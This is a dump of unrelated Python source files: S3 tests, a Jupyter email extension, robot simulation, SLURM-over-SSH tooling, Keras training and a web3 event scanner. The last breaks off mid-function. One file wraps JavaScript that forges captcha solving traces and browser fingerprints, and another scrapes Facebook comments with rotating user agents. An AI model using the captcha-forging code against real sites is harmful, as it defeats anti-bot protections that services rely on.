else: x = self.reg_layer(x) kl = torch.Tensor([0]) x = self.net2(x).squeeze() return x, kl.mean() tests/test_s3_policy_data.py #!/usr/bin/env python3 # coding: utf-8 import boto3 from botocore.stub import Stubber from wellcomeml.io import s3_policy_data def stubber_responses(stubber, mock_hash_file=None): list_buckets_response = { "Contents": [ { "Key": "good/path/file1.json" }, { "Key": "bad/path/file2.json" } ] } expected_params = {'Bucket': 'datalabs-dev'} stubber.add_response('list_objects_v2', list_buckets_response, expected_params) if mock_hash_file: get_object_response = { "Body": mock_hash_file } expected_params = {'Bucket': 'datalabs-dev', 'Key': 'good/path/file1.json'} stubber.add_response('get_object', get_object_response, expected_params) return stubber def policy_downloader(s3): return s3_policy_data.PolicyDocumentsDownloader( s3=s3, bucket_name="datalabs-dev", dir_path="good/path" ) def test_get_keys(): s3 = boto3.client('s3') stubber = Stubber(s3) stubber = stubber_responses(stubber) with stubber: policy_s3 = policy_downloader(s3) pdf_keys = policy_s3.pdf_keys assert pdf_keys == ['good/path/file1.json'] def test_get_hashes_with_word(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) hash_dicts = policy_s3.get_hashes(word_list=['the']) hash_list = [hash_dict['file_hash'] for hash_dict in hash_dicts] assert hash_list == ['x002'] def test_get_hashes(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) hash_dicts = policy_s3.get_hashes() hash_list = [hash_dict['file_hash'] for hash_dict in hash_dicts] hash_list.sort() assert hash_list == ['x001', 'x002'] def test_download_all_hash(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) documents = policy_s3.download(hash_list=None) document_hashes = [document['file_hash'] for document in documents] document_hashes.sort() assert document_hashes == ['x001', 'x002'] def test_download_one_hash(): s3 = boto3.client('s3') stubber = Stubber(s3) with open('tests/test_data/mock_s3_contents.json.gz', 'rb') as mock_hash_file: stubber = stubber_responses(stubber, mock_hash_file) with stubber: policy_s3 = policy_downloader(s3) documents = policy_s3.download(hash_list=['x002']) document_hashes = [document['file_hash'] for document in documents] assert document_hashes == ['x002'] 10-100 import os import os.path import logging from getpass import getpass from notebook.utils import url_path_join from .handlers import EmailHandler, EmailsListHandler def load_jupyter_server_extension(nb_server_app): """ Called when the extension is loaded. Args: nb_server_app (NotebookWebApplication): handle to the Notebook webserver instance. 
""" web_app = nb_server_app.web_app emails = nb_server_app.config.get("JupyterLabEmail", {}).get("smtp_servers", {}) # should be a list of template paths user_templates = nb_server_app.config.get("JupyterLabEmail", {}).get( "templates", {} ) headers = nb_server_app.config.get("JupyterLabEmail", {}).get("headers", {}) footers = nb_server_app.config.get("JupyterLabEmail", {}).get("footers", {}) signatures = nb_server_app.config.get("JupyterLabEmail", {}).get("signatures", {}) postprocessors = nb_server_app.config.get("JupyterLabEmail", {}).get( "postprocessors", {} ) base_url = web_app.settings["base_url"] host_pattern = ".*$" logging.critical( "Installing jupyterlab_email handler on path %s" % url_path_join(base_url, "emails") ) logging.critical( "Available email servers: %s" % ",".join(k["name"] for k in emails) ) for k in emails: if "password" in k: logging.critical( "WARNING!!! You should not store your password in jupyter_notebook_config.py!!!" ) elif "function" in k: logging.critical( "Skipping password input for %s@%s" % (k["username"], k["name"]) ) else: k["password"] = getpass( "Input password for %s@%s:" % (k["username"], k["name"]) ) context = {} context["emails"] = emails context["headers"] = headers context["footers"] = footers context["signatures"] = signatures context["postprocessors"] = postprocessors context["user_templates"] = user_templates context["templates"] = {} context["templates"]["email"] = os.path.join( os.path.dirname(__file__), "templates", "html_email.tpl" ) context["templates"]["email_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_html_email.tpl" ) context["templates"]["html"] = os.path.join( os.path.dirname(__file__), "templates", "html.tpl" ) context["templates"]["html_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_html.tpl" ) context["templates"]["pdf"] = os.path.join( os.path.dirname(__file__), "templates", "pdf.tplx" ) context["templates"]["pdf_nocode"] = os.path.join( os.path.dirname(__file__), "templates", "hide_code_cells_pdf.tplx" ) web_app.add_handlers( host_pattern, [(url_path_join(base_url, "email/get"), EmailsListHandler, context)], ) web_app.add_handlers( host_pattern, [(url_path_join(base_url, "email/run"), EmailHandler, context)] ) import json from ievv_opensource.utils.ievvbuildstatic import pluginbase from ievv_opensource.utils.shellcommandmixin import ShellCommandMixin class Plugin(pluginbase.Plugin, ShellCommandMixin): """ Autosetup jsdoc config and npm script. Examples: It is really simple to use:: IEVVTASKS_BUILDSTATIC_APPS = ievvbuildstatic.config.Apps( ievvbuildstatic.config.App( appname='demoapp', version='1.0.0', plugins=[ ievvbuildstatic.autosetup_jsdoc.Plugin(), ] ) ) If you need to adjust the config, simply setup your own ``build-docs`` script in package.json instead of using this plugin. 
""" name = 'autosetup_jsdoc' def install(self): self.app.get_installer('npm').queue_install( package='jsdoc', installtype='dev' ) def get_jsdoc_config_filename(self): return 'jsdoc.config.json' def get_jsdoc_config_path(self): return self.app.get_source_path(self.get_jsdoc_config_filename()) def make_jsdoc_config_dict(self): return { "opts": { "encoding": "utf8", "destination": "./built_docs/", "recurse": True }, "source": { "includePattern": ".+\\.js(doc|x)?$", "excludePattern": "(^|\\/|\\\\)_", "include": [ "./scripts/javascript/" ] }, "tags": { "allowUnknownTags": True, "dictionaries": ["jsdoc", "closure"] }, "plugins": ["plugins/markdown"], "markdown": { "parser": "gfm" }, "templates": { "cleverLinks": False, "monospaceLinks": False } } def create_jsdoc_config(self): open(self.get_jsdoc_config_path(), 'w').write( json.dumps( self.make_jsdoc_config_dict(), indent=2, sort_keys=True )) def run(self): self.get_logger().command_start('Autosetup jsdoc for {appname}'.format( appname=self.app.appname)) self.create_jsdoc_config() self.app.get_installer('npm').add_npm_script( 'build-docs', 'jsdoc -c {configpath}'.format( configpath=self.get_jsdoc_config_filename())) self.get_logger().command_success('Autoset jsdoc config succeeded :)') #!/usr/bin/env python3 import time import math from datetime import datetime from time import sleep import numpy as np import random import cv2 import os import argparse import torch from math import sin,cos,acos import matplotlib.pyplot as plt import sys sys.path.append('./Eval') sys.path.append('./') from env import Engine from utils_env import get_view,safe_path,cut_frame,point2traj,get_gripper_pos,backup_code def angleaxis2quaternion(angleaxis): angle = np.linalg.norm(angleaxis) axis = angleaxis / (angle + 0.00001) q0 = cos(angle/2) qx,qy,qz = axis * sin(angle/2) return np.array([qx,qy,qz,q0]) def quaternion2angleaxis(quater): angle = 2 * acos(quater[3]) axis = quater[:3]/(sin(angle/2)+0.00001) angleaxis = axis * angle return np.array(angleaxis) class Engine108(Engine): def __init__(self, worker_id, opti, p_id, taskId=5, maxSteps=15, n_dmps=3, cReward=True): super(Engine108,self).__init__(opti, wid=worker_id, p_id=p_id, maxSteps=maxSteps, taskId=taskId, n_dmps=n_dmps, cReward=cReward,robot_model=None) self.opti = opti def init_obj(self): self.obj_file = os.path.join(self.resources_dir,"urdf/objmodels/nut.urdf") self.obj_position = [0.3637 + 0.06, -0.06, 0.35] self.obj_scaling = 2 self.obj_orientation = self.p.getQuaternionFromEuler([math.pi/2+0.2, -math.pi/2, -0.3]) self.obj_id = self.p.loadURDF(fileName=self.obj_file, basePosition=self.obj_position,baseOrientation=self.obj_orientation, globalScaling=self.obj_scaling)#,physicsClientId=self.physical_id self.box_file = os.path.join (self.resources_dir, "urdf/openbox/openbox.urdf") self.box_position = [0.27, 0.00, -0.30] self.box_scaling = 0.00044 self.box_orientation = self.p.getQuaternionFromEuler ([0, math.pi, -math.pi/2]) self.box_id = self.p.loadURDF (fileName=self.box_file, basePosition=self.box_position, baseOrientation=self.box_orientation, globalScaling=self.box_scaling,useFixedBase=True) self.p.changeVisualShape (self.obj_id, -1, rgbaColor=[38/255.,0.,128/255.0,1]) self.p.changeDynamics(self.obj_id,-1,mass=2.0) def reset_obj(self): self.p.resetBasePositionAndOrientation(self.obj_id, self.obj_position, self.obj_orientation) def init_motion(self): self.data_q = np.load (os.path.join(self.robot_recordings_dir,"47-4/q.npy")) self.data_gripper = np.load (self.configs_dir + '/init/gripper.npy') 
self.robot.setJointValue(self.data_q[0],gripper=self.data_gripper[0]) def init_grasp(self): self.box_position[2] = -.30 self.p.resetBasePositionAndOrientation(self.box_id,self.box_position,self.box_orientation) self.robot.gripperControl(0) qlist = np.load( os.path.join(self.robot_recordings_dir, "47-4/q.npy")) glist = np.load( os.path.join(self.robot_recordings_dir, "47-4/gripper.npy")) num_q = len(qlist[0]) self.fix_orn = np.load (os.path.join (self.configs_dir, 'init', 'orn.npy')) self.null_q = qlist[180] self.robot.setJointValue(qlist[40],glist[40]) for i in range(40,180,1): glist[i] = min(120,glist[i]) self.robot.jointPositionControl(qlist[i],gripper=glist[i]) pos = self.robot.getEndEffectorPos() pos[2] += 0.15 orn = self.robot.getEndEffectorOrn() for i in range(109): self.robot.operationSpacePositionControl(pos,orn,null_pose=self.null_q,gripperPos=130) # time.sleep(3) self.start_pos = self.p.getLinkState (self.robotId, 7)[0] self.box_position[2] *= -1.0 self.p.resetBasePositionAndOrientation(self.box_id,self.box_position,self.box_orientation) def step_dmp(self,action,f_w,coupling,reset): if reset: action = action.squeeze() self.start_pos = self.robot.getEndEffectorPos() self.start_orn = quaternion2angleaxis(self.robot.getEndEffectorOrn()) self.start_gripper_pos = self.robot.getGripperPos() self.start_status = np.array([self.start_pos[0],self.start_pos[1],self.start_pos[2],self.start_orn[0],self.start_orn[1],self.start_orn[2],0.0]).reshape((-1,)) self.dmp.set_start(np.array(self.start_status)[:self.dmp.n_dmps]) dmp_end_pos = [x+y for x,y in zip(self.start_status,action)] self.dmp.set_goal(dmp_end_pos) if f_w is not None: self.dmp.set_force(f_w) self.dmp.reset_state() #self.traj = self.dmp.gen_traj() self.actual_traj = [] p1 = self.start_pos p1 = np.array(p1) self.dmp.timestep = 0 small_observation = self.step_within_dmp (coupling) #for idx, small_action in enumerate(self.traj): # if idx < 7: # for i in range(4): # small_observation = self.step_within_dmp (small_action) # else: # small_observation = self.step_within_dmp (small_action) #self.actual_traj.append(tmp_pos) #self.a_traj = np.array(self.actual_traj) #p2 = self.robot.getEndEffectorPos() #p2 = np.array(p2) lenT = len(self.dmp.force[:,0]) if self._wid == 0: fig = plt.figure(1) # plt.plot(np.arange(0,lenT),self.traj[:,0],'--',color='r') # plt.plot(np.arange(0,lenT),self.traj[:,1],'--',color='g') # plt.plot(np.arange(0,lenT),self.traj[:,2],'--',color='b') # plt.plot(np.arange(0,lenT),self.a_traj[:,0],color='red') # plt.plot(np.arange(0,lenT),self.a_traj[:,1],color='green') # plt.plot(np.arange(0,lenT),self.a_traj[:,2],color='blue') plt.plot(np.arange(0,lenT),self.dmp.force[:,0],color='red') plt.plot(np.arange(0,lenT),self.dmp.force[:,1],color='green') plt.plot(np.arange(0,lenT),self.dmp.force[:,2],color='blue') fig.canvas.draw() images = np.fromstring(fig.canvas.tostring_rgb(), dtype='uint8').reshape(480, 640, 3) cv2.imshow("Example",images) fig.canvas.figure.clf() cv2.waitKey(1) else: small_observation = self.step_within_dmp(coupling) seg = None observation_next, seg = self.get_observation(segFlag=True) reward = 0 done = False suc = False suc_info = self.get_success() if self.dmp.timestep >= self.dmp.timesteps: reward, done, suc = self.get_reward(seg) done = True self.success_flag = suc_info else: if np.sum(seg == 167772162) < 1: done = True self.success_flag = False return observation_next, reward, done, self.success_flag def get_success(self): box = self.p.getAABB (self.box_id, -1) box_center = [(x + y) * 0.5 for x, y in zip 
(box[0], box[1])] box_center = np.array(box_center) obj = self.p.getAABB (self.obj_id, -1) obj_center = [(x + y) * 0.5 for x, y in zip (obj[0], obj[1])] obj_center = np.array(obj_center) dist = np.linalg.norm(box_center - obj_center) # check whether the object is still in the gripper left_closet_info = self.p.getContactPoints (self.robotId, self.obj_id, self.robot.gripper_left_tip_index, -1) right_closet_info = self.p.getContactPoints (self.robotId, self.obj_id, self.robot.gripper_right_tip_index, -1) #print(len (left_closet_info),len (right_closet_info),obj[0][0], box[1][0]) if len (left_closet_info) > 0 and len (right_closet_info) > 0 and dist < 0.05: return True else: return False bccho/hpctools1-10 import subprocess import json from time import time, sleep import logging class SLURMCluster: """ Session manager for interacting with a SLURM-based cluster over SSH. Note: For authentication, generate a private/public key (e.g., with ssh-keygen) and copy public key to "~/.ssh/authorized_keys" on cluster. """ def __init__(self, host, user): """ Initializes session parameters. Args: host: cluster address user: username for authentication """ self.host = host self.user = user def run_cmd(self, cmd, encoding="utf-8"): """ Runs commands over ssh and returns output. """ # Concatenate multiple commands (lines) if type(cmd) == list: cmd = " && ".join(cmd) # Call ssh with auth and commands proc = subprocess.run(["ssh", self.user + "@" + self.host, cmd], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding=encoding) # Return outputs return proc.stdout def submit_job(self, script_path, script_args=[], slurm_args=[], working_directory="$HOME"): """ Submits a job via sbatch and returns the job ID. """ if type(script_args) == list: script_args = " ".join(script_args) if type(slurm_args) == list: slurm_args = " ".join(slurm_args) out = self.run_cmd([ "cd \"%s\"" % working_directory, "sbatch " + slurm_args + " " + script_path + " " + script_args ]) if not "Submitted batch job" in out: # TODO: raise exception logging.error("Failed to submit job: " + out) return None # Get job ID from output and return return out.split()[-1] def cancel_job(self, job_id): """ Cancels a job via scancel. """ self.run_cmd("scancel %s" % job_id) def get_job_state(self, job_id, compact=False): """ Returns job status code or None if does not exist. Status codes (from `man squeue`): (short code) (BF) BOOT_FAIL: Job terminated due to launch failure, typically due to a hardware failure (e.g. unable to boot the node or block and the job can not be requeued). (CA) CANCELLED: Job was explicitly cancelled by the user or system administrator. The job may or may not have been initiated. (CD) COMPLETED: Job has terminated all processes on all nodes with an exit code of zero. (CF) CONFIGURING: Job has been allocated resources, but are waiting for them to become ready for use (e.g. booting). (CG) COMPLETING: Job is in the process of completing. Some processes on some nodes may still be active. (DL) DEADLINE: Job terminated on deadline. (F) FAILED: Job terminated with non-zero exit code or other failure condition. (NF) NODE_FAIL: Job terminated due to failure of one or more allocated nodes. (OOM) OUT_OF_MEMORY: Job experienced out of memory error. (PD) PENDING: Job is awaiting resource allocation. (PR) PREEMPTED: Job terminated due to preemption. (R) RUNNING: Job currently has an allocation. (RD) RESV_DEL_HOLD: Job is held. (RF) REQUEUE_FED: Job is being requeued by a federation. (RH) REQUEUE_HOLD: Held job is being requeued. 
(RQ) REQUEUE: Completing job is being requeued. (RS) RESIZING: Job is about to change size. (RV) REVOKED: Sibling was removed from cluster due to other cluster starting the job. (S) SUSPENDED: Job has an allocation, but execution has been suspended and CPUs have been released for other jobs. (SE) SPECIAL_EXIT: The job was requeued in a special state. This state can be set by users, typically in EpilogSlurmctld, if the job has terminated with a particular exit value. (SI) SIGNALING: Job is being signaled. (ST) STOPPED: Job has an allocation, but execution has been stopped with SIGSTOP signal. CPUS have been retained by this job. (TO) TIMEOUT: Job terminated upon reaching its time limit. """ code = "state" if compact: code = "statecompact" # Query squeue for state out = self.run_cmd('squeue -j %s --Format="%s"' % (str(job_id), code)) # Check if job exists if "slurm_load_jobs error: Invalid job id specified" in out: return None return out.splitlines()[-1].strip() def job_info(self, job_id): """ Returns squeue info about a job or None if it does not exist. See `man squeue` for possible fields. """ # Query squeue for all available info out = self.run_cmd("squeue -j " + str(job_id) + " --format="+'"%all"') # Check if job exists if "slurm_load_jobs error: Invalid job id specified" in out: return None # Split output into cells fields, vals = [row.split("|") for row in out.splitlines()] # Return dictionary from filtered job data return {k: v for k,v in zip(fields, vals) if len(k) > 0} def wait_for_job(self, job_id, timeout=60, poll_interval=1, verbose=True): """ Blocks until job starts running. Args: job_id: SLURM job ID (str or int) timeout: seconds before returning or None to wait indefinitely (default: 60) poll_interval: seconds between polling (default: 1) verbose: print status messages (default: True) Returns: is_running: True if the job started running, False if timed out total_time_elapsed: total seconds spent waiting """ if verbose: print("Waiting for job %s... " % str(job_id), end="", flush=True) t0 = time() done = False while not done: # Poll for job state t0_poll = time() is_running = self.get_job_state(job_id) == "RUNNING" # Compute timing poll_elapsed = time() - t0_poll total_time_elapsed = time() - t0 # Check for timeout timed_out = timeout is not None and (time() - t0) >= timeout # Should we stop? done = is_running or timed_out if not done: # Compute poll interval remaining interval_remaining = max([poll_interval - poll_elapsed, 0]) # Wait sleep(interval_remaining) if verbose: if is_running: print("Running after %.1f seconds." % total_time_elapsed) elif timed_out: print("Timed out after %.1f seconds." % total_time_elapsed) else: print("Failed to run after %.1f seconds." 
% total_time_elapsed) return is_running, total_time_elapsed from requests_soup import chorme_get_page from user_agent import generate_user_agent from bs4 import BeautifulSoup from random import randint import requests import time import re # Full article def get_article_content(content_url): headers = {'User-Agent':generate_user_agent()} # article_res = requests.get(content_url, headers=headers) # article_soup = BeautifulSoup(article_res.text, 'html.parser') article_soup = chorme_get_page(content_url) article_contents = article_soup.select('div[style=""]')[0].text return article_contents # All comments def get_comments(comment_url, comment_nums): all_comments = list() for i in range(0, comment_nums, 10): headers = {'User-Agent':generate_user_agent()} payload = { 'p':i, 'refid':'18' } res_comments = requests.get(comment_url, headers=headers, params=payload) soup_comment = BeautifulSoup(res_comments.text, 'html.parser') for com in soup_comment.find_all(id=re.compile(r'^\d{10,17}')): # if comment in comments more_comments = com.find_all(id=re.compile('comment_replies_more.+')) if more_comments: more_comments = 'https://mbasic.facebook.com'+com.find_all(id=re.compile('comment_replies_more.+'))[0].a['href'] # print(more_comments) time.sleep(randint(3,6)) res_more = requests.get(more_comments, headers=headers) soup_more = BeautifulSoup(res_more.text, 'html.parser') for m in soup_more.find_all(id=re.compile(r'\d{10,17}')): per_comment = {} reponse_id = m['id'] per_comment['id']=reponse_id # print(m['id'], end=', ') response_name = m.a.text per_comment['name'] = response_name # print(m.a.text, end=', ') # 如果留言中的留言超過10筆,會有額外的url try: response_content = m.div.div.text per_comment['comment'] = response_content # print(m.div.div.text) except AttributeError as e: print(e) pass all_comments.append(per_comment) else: per_comment = {} reponse_id = com['id'] per_comment['id']=reponse_id # print(com['id']) response_name = com.a.text per_comment['name'] = response_name # print(com.a.text, end=":") response_content = com.select('div')[0].text.split('讚')[0].replace(response_name,'') per_comment['comment'] = response_content # print(com.select('div')[0].text.split('讚')[0].replace(com.a.text,'')) all_comments.append(per_comment) time.sleep(randint(3,7)) time.sleep(randint(2,8)) return all_comments if __name__ == '__main__': url = 'https://mbasic.facebook.com/comment/replies/?ctoken=&count=11&curr&pc=1&ft_ent_identifier=5413685551983107&gfid=AQCCwRAMTgknIVNB_EU&refid=18&__tn__=R' get_comments(url, 2115)src/tricks/calculator.py import ast import math import operator from flask import Flask, url_for, make_response from utils.utils import l_singleton2obj # app = Flask(__name__) # def index(): operators = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv, ast.Pow: operator.pow, ast.BitXor: operator.xor, ast.USub: operator.neg, ast.Mod: operator.mod, } h_func_unary = {"sin": math.sin, "cos": math.cos, "tan": math.tan, "floor": math.floor, "ceil": math.ceil, "round": round, } h_name = {"PI": math.pi} def calculate(s_IN, ): h_env = {} try: s_OUT = _eval_calculate(ast.parse(s_IN, mode='eval').body, h_env) return s_OUT except: return make_response("Invalid input: '{0}'".format(s_IN)) def _eval_calculate(node, h_env): t = type(node) if isinstance(node, ast.Num): # return node.n if isinstance(node, ast.BinOp): # v_LEFT = _eval_calculate(node.left, h_env) v_RIGHT = _eval_calculate(node.right, h_env) f_op = operators[type(node.op)] return 
f_op(v_LEFT, v_RIGHT) if isinstance(node, ast.UnaryOp): # e.g., -1 v_OPERAND = _eval_calculate(node.operand, h_env) f_op = operators[type(node.op)] return f_op(v_OPERAND) if isinstance(node, ast.Name): if node.id not in h_name: raise Exception() return h_name[node.id] if isinstance(node, ast.Call): func_name = node.func.id.lower() if func_name in h_func_unary: if len(node.args) > 1: raise Exception() if node.keywords: raise Exception() f_op = h_func_unary[func_name] arg = _eval_calculate(l_singleton2obj(node.args), h_env) return f_op(arg) raise TypeError(node) qqizai/Func_Js_Crack # -*- coding: utf-8 -*- # @Time : 2019/11/1 21:58 # @Author : Esbiya # @Email : # @File : encrypt.py # @Software: PyCharm import execjs def _reload_js(): """ 加载 js :return: """ with open('yd_slider.js', 'rb') as f: slider_js = f.read().decode() with open('generate_fp.js', 'rb') as f: fp_js = f.read().decode() return slider_js, fp_js def _get_cb(js): """ 生成 cp 参数 :param js: :return: """ ctx = execjs.compile(js) return ctx.call('get_cb')[:64] def _get_fp(js): """ 生成指纹 fp :param js: :return: """ ctx_ = execjs.compile(js) return ctx_.call('generateFingerprint') def _encrypt_slider(js, token, trace, width): """ 滑块验证加密 加密轨迹 :param token: :param trace: :param width :return: """ ctx = execjs.compile(js) return ctx.call('slider_encrypt', token, trace, width) def _encrypt_click(js, token, trace, position): """ 点选验证加密 加密轨迹与点选位置 :param js: :param token: :param trace: :param position: :return: """ ctx = execjs.compile(js) return ctx.call('click_encrypt', token, trace, position) def _encrypt_sense(js, token, trace, position): """ 无感验证加密 加密轨迹与点击位置 :param js: :param token: :param trace: :param position: :return: """ ctx = execjs.compile(js) return ctx.call('sense_encrypt', token, trace, position) def _encrypt_validate(js, validate, fp): """ 加密 validate :param js: :param validate: 验证码通过签名 :param fp: 指纹 :return: """ ctx = execjs.compile(js) return ctx.call('encrypt_validate', validate, fp) from prerequisites import * def train_model(epoch_count, batch_size, file_suffix, optimizer): # get dataset class_count, train_datagen, train_generator, val_datagen, val_generator, test_datagen, test_generator \ = get_data(batch_size) train_steps = len(train_generator.filenames) // batch_size val_steps = len(val_generator.filenames) // batch_size test_steps = len(test_generator.filenames) // batch_size # get model with trainable: last convolutional layer & all fully connected layers model = get_prepared_model(class_count, first_trainable_layer='block1_conv1') # compile model model.compile( loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']) # train model training_history = model.fit_generator( train_generator, steps_per_epoch=train_steps, epochs=epoch_count, validation_data=val_generator, validation_steps=val_steps, callbacks=[callbacks.EarlyStopping(monitor='val_loss', patience=20, verbose=0, min_delta=1e-4)] ) model.save(f'results/learned_vgg16_Z2a{file_suffix}.h5') # test model test_score = model.evaluate_generator(test_generator, steps=test_steps) print(f'\n\n{file_suffix}') print(f'Test loss: {test_score[0]}') print(f'Test acc: {test_score[1]}') # pickle learning history with open(f'results/history_vgg16_Z2a{file_suffix}.pickle', 'wb') as file: pickle.dump(training_history, file) del training_history del model K.clear_session() gc.collect() def experiment_learning_rate(): batch_size = 20 epoch_count = 50 for learning_rate in [0.001, 0.0005, 0.0001, 0.00005]: train_model( epoch_count=epoch_count, 
batch_size=batch_size, file_suffix=f'_learning_rate_{learning_rate}', optimizer=optimizers.RMSprop(learning_rate=learning_rate) ) def experiment_batch_size(): learning_rate = 0.00005 epoch_count = 70 optimizer = optimizers.RMSprop(learning_rate=learning_rate) for batch_size in [5, 10, 15, 20]: train_model( epoch_count=epoch_count, batch_size=batch_size, file_suffix=f'_batch_size_{batch_size}', optimizer=optimizer ) train_model( epoch_count=70, batch_size=10, file_suffix=f'_adam_2c_batch_v1_', optimizer=optimizers.Adam(lr=0.00001) ) modules/google-earth-engine/docker/src/sepalinternal/mosaic/haze.py from ..image_operation import ImageOperation import ee def mask_haze(mosaic_def, collection): if mosaic_def.haze_tolerance == 1: return collection # No point of reducing and mapping the collection if we have full haze tolerance max_haze_score = collection.select('hazeScore').max() return collection.map( lambda image: _MaskHaze(image).apply(mosaic_def.haze_tolerance, max_haze_score)) class _MaskHaze(ImageOperation): def __init__(self, image): super(_MaskHaze, self).__init__(image) def apply(self, haze_tolerance, max_haze_score): score_threshold = max_haze_score.multiply(1 - haze_tolerance) if haze_tolerance > 0: score_threshold = score_threshold.min(9100) mask = self.toImage('hazeScore').gte(score_threshold) return self.image.updateMask(mask) datafreezer/signals.py # Imports from django. # NOQA # from django.conf import settings # from django.core.mail import EmailMultiAlternatives # from django.db.models.signals import ( # post_save, # NOQA # # pre_save, # ) # from django.dispatch import receiver, Signal # from django.template.loader import render_to_string pass import shutil from pathlib import Path import pytest @pytest.fixture def d2b_run_e2e(tmpdir) -> Path: src = Path(__file__).parent / "data/d2b_run_e2e" dst = Path(tmpdir) / "d2b_run_e2e" shutil.copytree(src, dst) return dst @pytest.fixture def scaffold_test_data(tmpdir: str) -> Path: src = Path(__file__).parent / "data/scaffold_test" dst = Path(tmpdir) / "scaffold_test" shutil.copytree(src, dst) return dst # type: ignore """ How to scan and store past events in the blockchain, using web3.eth.get_logs. Taken from https://web3py.readthedocs.io/en/stable/examples.html#advanced-example-fetching-all-token-transfer-events --- A stateful event scanner for Ethereum-based blockchains using Web3.py. With the stateful mechanism, you can do one batch scan or incremental scans, where events are added wherever the scanner left off. """ import datetime import time import logging from abc import ABC, abstractmethod from typing import Tuple, Optional, Callable, List, Iterable from web3 import Web3 from web3.contract import Contract from web3.datastructures import AttributeDict from web3.exceptions import BlockNotFound from eth_abi.codec import ABICodec # Currently this method is not exposed over official web3 API, # but we need it to construct eth_getLogs parameters from web3._utils.filters import construct_event_filter_params from web3._utils.events import get_event_data logger = logging.getLogger(__name__) class EventScannerState(ABC): """Application state that remembers what blocks we have scanned in the case of crash. """ @abstractmethod def get_last_scanned_block(self) -> int: """Number of the last block we have scanned on the previous cycle. :return: 0 if no blocks scanned yet """ @abstractmethod def start_chunk(self, block_number: int): """Scanner is about to ask data of multiple blocks over JSON-RPC. Start a database session if needed. 
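(For example, an implementation might begin a database transaction here and commit it later in end_chunk().)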
""" @abstractmethod def end_chunk(self, block_number: int): """Scanner finished a number of blocks. Persistent any data in your state now. """ @abstractmethod def process_event(self, block_when: datetime.datetime, event: AttributeDict) -> object: """Process incoming events. This function takes raw events from Web3, transforms them to your application internal format, then saves them in a database or some other state. :param block_when: When this block was mined :param event: Symbolic dictionary of the event data :return: Internal state structure that is the result of event tranformation. """ @abstractmethod def delete_data(self, since_block: int) -> int: """Delete any data since this block was scanned. Purges any potential minor reorg data. """ class EventScanner: """Scan blockchain for events and try not to abuse JSON-RPC API too much. Can be used for real-time scans, as it detects minor chain reorganisation and rescans. Unlike the easy web3.contract.Contract, this scanner can scan events from multiple contracts at once. For example, you can get all transfers from all tokens in the same scan. You *should* disable the default `http_retry_request_middleware` on your provider for Web3, because it cannot correctly throttle and decrease the `eth_getLogs` block number range. """ def __init__(self, web3: Web3, contract: Contract, state: EventScannerState, events: List, filters: {}, max_chunk_scan_size: int = 10000, max_request_retries: int = 30, request_retry_seconds: float = 3.0): """ :param contract: Contract :param events: List of web3 Event we scan :param filters: Filters passed to getLogs :param max_chunk_scan_size: JSON-RPC API limit in the number of blocks we query. (Recommendation: 10,000 for mainnet, 500,000 for testnets) :param max_request_retries: How many times we try to reattempt a failed JSON-RPC call :param request_retry_seconds: Delay between failed requests to let JSON-RPC server to recover """ self.logger = logger self.contract = contract self.web3 = web3 self.state = state self.events = events self.filters = filters # Our JSON-RPC throttling parameters self.min_scan_chunk_size = 10 # 12 s/block = 120 seconds period self.max_scan_chunk_size = max_chunk_scan_size self.max_request_retries = max_request_retries self.request_retry_seconds = request_retry_seconds # Factor how fast we increase the chunk size if results are found # # (slow down scan after starting to get hits) self.chunk_size_decrease = 0.5 # Factor how was we increase chunk size if no results found self.chunk_size_increase = 2.0 @property def address(self): return self.token_address def get_block_timestamp(self, block_num) -> datetime.datetime: """Get Ethereum block timestamp""" try: block_info = self.web3.eth.getBlock(block_num) except BlockNotFound: # Block was not mined yet, # minor chain reorganisation? return None last_time = block_info["timestamp"] return datetime.datetime.utcfromtimestamp(last_time) def get_suggested_scan_start_block(self): """Get where we should start to scan for new token events. If there are no prior scans, start from block 1. Otherwise, start from the last end block minus ten blocks. We rescan the last ten scanned blocks in the case there were forks to avoid misaccounting due to minor single block works (happens once in a hour in Ethereum). These heurestics could be made more robust, but this is for the sake of simple reference implementation. 
""" end_block = self.get_last_scanned_block() if end_block: return max(1, end_block - self.NUM_BLOCKS_RESCAN_FOR_FORKS) return 1 def get_suggested_scan_end_block(self): """Get the last mined block on Ethereum chain we are following.""" # Do not scan all the way to the final block, as this # block might not be mined yet return self.web3.eth.blockNumber - 1 def get_last_scanned_block(self) -> int: return self.state.get_last_scanned_block() def delete_potentially_forked_block_data(self, after_block: int): """Purge old data in the case of blockchain reorganisation.""" self.state.delete_data(after_block) def scan_chunk(self, start_block, end_block) -> Tuple[int, datetime.datetime, list]: """Read and process events between to block numbers. Dynamically decrease the size of the chunk if the case JSON-RPC server pukes out. :return: tuple(actual end block number, when this block was mined, processed events) """ block_timestamps = {} get_block_timestamp = self.get_block_timestamp # Cache block timestamps to reduce some RPC overhead # Real solution might include smarter models around block def get_block_when(block_num): if block_num not in block_timestamps: block_timestamps[block_num] = get_block_timestamp(block_num) return block_timestamps[block_num] all_processed = [] for event_type in self.events: # Callable that takes care of the underlying web3 call def _fetch_events(_start_block, _end_block): return _fetch_events_for_all_contracts(self.web3, event_type, self.filters, from_block=_start_block, to_block=_end_block) # Do `n` retries on `eth_getLogs`, # throttle down block range if needed end_block, events = _retry_web3_call( _fetch_events, start_block=start_block, end_block=end_block, retries=self.max_request_retries, delay=self.request_retry_seconds) for evt in events: idx = evt["logIndex"] # Integer of the log index position in the block, null when its pending # We cannot avoid minor chain reorganisations, but # at least we must avoid blocks that are not mined yet assert idx is not None, "Somehow tried to scan a pending block" block_number = evt["blockNumber"] # Get 